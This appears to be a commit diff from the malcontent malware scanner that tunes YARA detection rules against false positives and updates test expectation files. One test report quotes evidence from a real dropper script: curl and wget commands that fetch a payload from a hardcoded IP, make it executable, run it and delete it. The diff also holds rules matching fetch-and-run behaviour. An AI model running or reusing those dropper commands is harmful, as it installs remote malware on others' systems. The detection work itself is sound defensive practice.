Address recent, non-data file false positives (#694)

* Address recent, non-data file false positives

Signed-off-by: egibs <[email protected]>

* Downgrade third-party UPX rule to high

Signed-off-by: egibs <[email protected]>

* Just rely on our first-party UPX rule

Signed-off-by: egibs <[email protected]>

* Refresh test data

Signed-off-by: egibs <[email protected]>

* Tweak base64 JS rule

Signed-off-by: egibs <[email protected]>

* Remove redundant override

Signed-off-by: egibs <[email protected]>

---------

Signed-off-by: egibs <[email protected]>

pkg/compile/compile.go

@@ -31,6 +31,8 @@ var badRules = map[string]bool{
 	"SIGNATURE_BASE_Reconcommands_In_File":                true,
 	"SIGNATURE_BASE_Apt_CN_Tetrisplugins_JS":              true,
 	"CAPE_Sparkrat":                                       true,
+	"SECUINFRA_SUSP_Powershell_Base64_Decode":             true,
+	"SIGNATURE_BASE_SUSP_ELF_LNX_UPX_Compressed_File":     true,
 	// ThreatHunting Keywords (some duplicates)
 	"Adobe_XMP_Identifier":                       true,
 	"Antivirus_Signature_signature_keyword":      true,

pkg/programkind/programkind.go

@@ -21,6 +21,7 @@ var supportedKind = map[string]string{
 	"asm":     "",
 	"bash":    "application/x-bsh",
 	"bat":     "application/bat",
+	"beam":    "application/x-erlang-binary",
 	"bin":     "application/octet-stream",
 	"c":       "text/x-c",
 	"cc":      "text/x-c",
@@ -167,6 +168,8 @@ func File(path string) (*FileType, error) {
 		return Path(".script"), nil
 	case strings.Contains(s, "#include <"):
 		return Path(".c"), nil
+	case strings.Contains(s, "BEAMAtU8"):
+		return Path(".beam"), nil
 	}
 	return nil, nil
 }

rules/anti-static/base64/function_names.yara

@@ -122,8 +122,9 @@ rule base64_php_functions_multiple: critical {
     $f_wp_nonce_field     = "wp_nonce_field" base64
     $f_wp_verify_nonce    = "wp_verify_nonce" base64
 
-    $not_comment     = "// processing instruction, e.g. <?php ?>"
-    $not_mongosh_php = { 3C 3F 70 68 70 00 00 00 01 0C 51 61 03 00 00 00 02 00 00 00 3F 3E }
+    $not_comment         = "// processing instruction, e.g. <?php ?>"
+    $not_mongosh         = "lib-boxednode/mongosh"
+    $not_mongosh_license = "For license information please see mongosh.js.LICENSE.txt"
 
   condition:
     $php and $base64_decode and 2 of ($f_*) and none of ($not*)
@@ -162,4 +163,3 @@ rule base64_python_functions: critical {
   condition:
     2 of ($f*) and none of ($not*)
 }
-

rules/anti-static/obfuscation/js.yara

@@ -3,9 +3,9 @@ import "math"
 private rule probably_js {
   strings:
     $f_function = /function\(\w{0,8}\)/
-    $f_const    = "const" fullword
-    $f_return   = "return" fullword
-    $f_var      = "var" fullword
+    $f_const    = /\bconst\s/
+    $f_return   = /\breturn\s/
+    $f_var      = /\bvar\s/
     $f_Array    = "Array.prototype" fullword
     $f_true     = "true);"
     $f_run      = ".run("

rules/c2/tool_transfer/shell.yara

@@ -35,7 +35,7 @@ rule fetch_tar_run: high {
     filesize < 1MB and any of them
 }
 
-rule tool_chmod_relative_run_tiny: critical {
+rule tool_chmod_relative_run_tiny: high {
   meta:
     description = "fetch file, make it executable, and run it"
 
@@ -46,12 +46,8 @@ rule tool_chmod_relative_run_tiny: critical {
     $o_chmod     = /chmod [\+\-\w \$\@\{\w\/\.]{0,64}/
     $o_dot_slash = /\.\/[\$a-z]{1,2}[a-z\.\/\- ]{0,32}/ fullword
 
-    $not_copyright_comment = "# Copyright"
-    $not_source            = "source ./"
-    $not_apache_license    = "Apache License"
-
   condition:
-    filesize < 6KB and any of ($must*) and all of ($o*) and none of ($not*)
+    filesize < 6KB and any of ($must*) and all of ($o*)
 }
 
 rule helm_test_env: override {
@@ -166,7 +162,7 @@ rule nohup_dropper: critical {
     possible_dropper and $nohup
 }
 
-rule obsessive_dropper: critical {
+rule obsessive_dropper: high {
   meta:
     description = "invokes multiple tools to download and execute a program"
 

rules/data/embedded/embedded-base64-gzip.yara

@@ -23,17 +23,17 @@ rule base64_gz_high_entropy: high {
     filesize < 2MB and math.entropy(1, filesize) >= 6.5 and $header and none of ($not*)
 }
 
-rule base64_obfuscated_js: critical {
+rule base64_obfuscated_js: high {
   meta:
     description = "Contains base64 gzip content within high-entropy javascript"
 
   strings:
-    $header = "H4sIA"
-    $       = "charAt("
-    $       = "substr("
-    $       = "join("
-    $       = "function("
+    $f_header   = "H4sIA"
+    $f_char_at  = "charAt("
+    $f_substr   = "substr("
+    $f_join     = "join("
+    $f_function = "function("
 
   condition:
-    filesize < 2MB and all of them and math.entropy(1, filesize) >= 5.0
+    filesize < 2MB and all of ($f*) and math.entropy(1, filesize) >= 5.0
 }

rules/false_positives/rb_train_core.yara

@@ -0,0 +1,13 @@
+rule train_transports_local: override {
+  meta:
+    description                                    = "train-core-3.10.8.gem"
+    SIGNATURE_BASE_Powershell_Susp_Parameter_Combo = "high"
+
+  strings:
+    $author1    = "# author: Dominik Richter"
+    $author2    = "# author: Christoph Hartmann"
+    $transports = "module Train::Transports"
+
+  condition:
+    filesize < 50KB and all of them
+}

rules/false_positives/sonarqube.yara

@@ -0,0 +1,14 @@
+rule sonarqube_tutorial_app: override {
+  meta:
+    description                                        = "TutorialsApp-C-wTMsCs.js"
+    SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1 = "high"
+
+  strings:
+    $image        = "sonarsource/sonarqube-scan"
+    $license      = "/*! licenses: /vendor.LICENSE.txt */"
+    $project_key  = "sonar.projectKey"
+    $project_name = "sonar.projectName"
+
+  condition:
+    filesize < 192KB and all of them
+}

tests/javascript/2024.obfuscated/009a55a7695bc32f0d031205475b356ceebd840d820ae9e7ee5e6d74ae45185e.js.simple

@@ -1,3 +1,3 @@
-# javascript/2024.obfuscated/009a55a7695bc32f0d031205475b356ceebd840d820ae9e7ee5e6d74ae45185e.js: critical
+# javascript/2024.obfuscated/009a55a7695bc32f0d031205475b356ceebd840d820ae9e7ee5e6d74ae45185e.js: high
 anti-static/obfuscation/js: medium
-data/embedded/base64_gzip: critical
+data/embedded/base64_gzip: high

tests/linux/2019.ChinaZ/yk.simple

@@ -1,7 +1,6 @@
 # linux/2019.ChinaZ/yk: critical
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
-anti-static/obfuscation/js: medium
 c2/addr/server: medium
 c2/addr/url: low
 crypto/rc4: low

tests/linux/2021.FontOnLake/45E9.elf.simple

@@ -1,6 +1,5 @@
 # linux/2021.FontOnLake/45E9.elf: critical
 3P/elastic/rootkit_fontonlake: critical
-3P/sig_base/susp_elf_upx: critical
 anti-static/packer/upx: high
 c2/addr/ip: high
 c2/addr/url: low

tests/linux/2024.Darkcracks/darkcracks.sh.md

@@ -2,11 +2,11 @@
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
 |--|--|--|--|
-| CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)<br>[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code) |
 | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) |
 | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)<br>[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)<br>[sleep 3](https://github.com/search?q=sleep+3&type=code) |
 | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) |
 | HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)<br>[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) |
+| HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)<br>[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code) |
 | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code) |
 | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) |
 | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./agr](https://github.com/search?q=.%2Fagr&type=code)<br>[./wdvsh](https://github.com/search?q=.%2Fwdvsh&type=code) |

tests/linux/2024.hadooken/drop1.sh.simple

@@ -2,7 +2,7 @@
 anti-static/base64/exec: critical
 anti-static/base64/function_names: critical
 c2/addr/ip: high
-c2/tool_transfer/shell: critical
+c2/tool_transfer/shell: high
 data/base64/external: medium
 data/embedded/base64_url: medium
 data/encoding/base64: low

tests/linux/2024.vncjew/__min__c.simple

@@ -1,5 +1,4 @@
 # linux/2024.vncjew/__min__c: critical
-3P/sig_base/susp_elf_upx: critical
 anti-static/elf/entropy: high
 anti-static/elf/header: high
 anti-static/packer/upx: high

tests/linux/clean/emscripten.sh.simple

@@ -3,7 +3,6 @@ c2/tool_transfer/download: medium
 c2/tool_transfer/shell: medium
 evasion/file/location/HOME: medium
 evasion/file/prefix: medium
-false-positives/rust: low
 fs/file/delete: medium
 fs/file/delete_forcibly: low
 fs/file/make_executable: medium

tests/linux/clean/libsystemd.so.0.simple

@@ -1,5 +1,4 @@
 # linux/clean/libsystemd.so.0: medium
-anti-static/obfuscation/js: medium
 c2/addr/url: low
 c2/tool_transfer/arch: low
 c2/tool_transfer/os: low

tests/linux/clean/mongosh.simple

@@ -1,5 +1,4 @@
-# linux/clean/mongosh: critical
-anti-static/base64/function_names: critical
+# linux/clean/mongosh: medium
 anti-static/obfuscation/hex: medium
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium

tests/linux/clean/pull-scripts.simple

@@ -2,7 +2,6 @@
 c2/tool_transfer/shell: medium
 exec/shell/exec: medium
 exec/shell/ignore_output: medium
-false-positives/rancher: low
 fs/directory/create: low
 fs/file/delete_forcibly: medium
 fs/file/make_executable: medium

tests/windows/clean/make-win.ps1.simple

@@ -1,6 +1,5 @@
 # windows/clean/make-win.ps1: high
 3P/InQuest-VT/base64_powershell_directives: high
-3P/secuinfra/susp_powershell_base64: medium
 data/base64/decode: medium
 data/embedded/base64_terms: medium
 exec/shell/pipe_sh: medium